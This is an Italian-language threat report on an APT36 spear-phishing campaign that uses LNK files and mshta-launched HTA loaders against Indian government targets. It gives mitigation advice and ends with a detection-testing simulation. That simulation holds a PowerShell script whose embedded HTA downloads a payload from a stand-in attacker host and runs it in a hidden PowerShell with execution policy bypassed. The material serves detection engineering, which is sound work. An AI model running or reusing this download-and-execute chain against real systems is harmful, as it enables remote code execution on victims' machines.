APT36: Campagna di Malware LNK Multi-Fase che Prende di Mira Entità Governative Indiane

Riepilogo

APT36 (Transparent Tribe) ha condotto una campagna di spear-phishing che ha consegnato una scorciatoia LNK malevola mascherata da PDF. Quando aperto, il collegamento lancia mshta.exe per eseguire un loader basato su HTA che decritta ed esegue payloads in memoria, inclusi un modulo di configurazione e un RAT DLL con tutte le funzionalità. Il malware seleziona dinamicamente i metodi di persistenza basati sul prodotto antivirus installato sulla vittima e si connette al suo server di comando e controllo su un canale crittografato. L’attività è valutata come focalizzata sull’espionaggio, prendendo di mira organizzazioni governative e accademiche indiane per rubare dati.

Indagine

I ricercatori hanno analizzato il file LNK insolitamente grande, tracciato il contenuto HTA incorporato ospitato su innlive.in, e ingegnerizzato al contrario la logica di decrittazione. La catena ha rivelato due fasi principali: un payload di deserializzazione .NET utilizzato per indebolire o bypassare i controlli di sicurezza, seguito da un DLL malevolo senza file (ad es., ki2mtmkl.dll / iinneldc.dll) che fornisce funzionalità RAT. Il comportamento di persistenza è stato mappato a specifici prodotti antivirus e dettagli chiave C2—come porta TCP 8621 e una chiave AES usata per il traffico crittografato—sono stati estratti durante l’analisi.

Mitigazione

Limitare o mettere in quarantena i file shortcut (.lnk) allegati consegnati via email, particolarmente quando confezionati in archivi ZIP. Applicare politiche di controllo delle applicazioni per limitare l’esecuzione di mshta.exe, PowerShell e altri engine di scripting da percorsi scrivibili dall’utente. Utilizzare rilevazioni endpoint per catene di processo che coinvolgono mshta.exe e indicatori di esecuzione DLL in memoria, e applicare severi controlli di uscita per bloccare la comunicazione con domini sconosciuti o non fidati.

Risposta

Se viene rilevata un’esecuzione LNK sospetta, isolare il sistema, acquisire immagini della memoria e cercare indicatori DLL in memoria legati alla fase RAT. Bloccare i domini malevoli identificati e l’infrastruttura IP correlata, e ruotare le credenziali potenzialmente esposte. Eseguire un’analisi forense per localizzare artefatti di persistenza nella cartella di avvio e nel registro, rimuoverli, e convalidare che non rimangano ulteriori punti d’appoggio.

Esecuzione di Simulazione

Prerequisito: Il Controllo Pre-volo di Telemetria e Baseline deve essere passato.

Razionale: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare la telemetria esatta prevista dalla logica di rilevamento.

• Narrazione di Attacco & Comandi:
  Un avversario ha ottenuto accesso PowerShell a basso privilegio su una workstation compromessa. Per eseguire un payload remoto senza scrivere un eseguibile su disco, l’attaccante utilizza mshta.exe per eseguire un file HTA che recupera un backdoor PowerShell da un server C2. I passaggi sono:

  1. Codifica un HTA malevolo minimo che lancia PowerShell per scaricare ed eseguire un payload.
  2. Ospita l’HTA su un server web (es., http://attacker.local/malicious.hta).
  3. Dalla sessione PowerShell compromessa, invoca mshta.exe con l’URL remoto come argomento.

  Questa catena crea un evento di creazione di processo dove mshta.exe è il figlio di powershell.exe, corrispondendo precisamente alla regola Sigma.

• Script di Test di Regressione:

  #-------------------------------------------------
  # Script simulato dell'attaccante – attiva la regola
  #-------------------------------------------------
  
  # 1. Definisci l'HTA malevolo (inline per scopi dimostrativi)
  $htaContent = @"
  <script>
      // Scarica ed esegui un payload PowerShell di prova
      var url = 'http://attacker.local/payload.ps1';
      var xhr = new ActiveXObject('Microsoft.XMLHTTP');
      xhr.open('GET', url, false);
      xhr.send();
      var ps = new ActiveXObject('WScript.Shell');
      ps.Run('powershell -NoProfile -ExecutionPolicy Bypass -Command "' + xhr.responseText + '"', 0, false);
  </script>
  "@
  
  # 2. Scrivi l'HTA in posizione temporanea (simulando un file ospitato)
  $tempPath = "$env:TEMPmalicious.hta"
  $htaContent | Set-Content -Path $tempPath -Encoding ASCII
  
  # 3. Lancia mshta.exe da PowerShell (il trigger del rilevamento)
  $mshta = (Get-Command mshta.exe).Source
  Write-Host "[*] Avviando mshta.exe per eseguire il payload HTA..."
  Start-Process -FilePath $mshta -ArgumentList "`"$tempPath`"" -NoNewWindow
  
  # Optional: Sospendi per consentire la cattura dell'evento
  Start-Sleep -Seconds 5
  
  # Pulizia (gestita nella sezione successiva)

• Comandi di Pulizia:

  # Rimuovi file HTA temporaneo
  Remove-Item -Path "$env:TEMPmalicious.hta" -Force -ErrorAction SilentlyContinue
  
  # Ferma eventuali processi mshta.exe persistenti (improbabile dopo esecuzione normale)
  Get-Process -Name mshta -ErrorAction SilentlyContinue | Stop-Process -Force
  
  Write-Host "[*] Pulizia completata."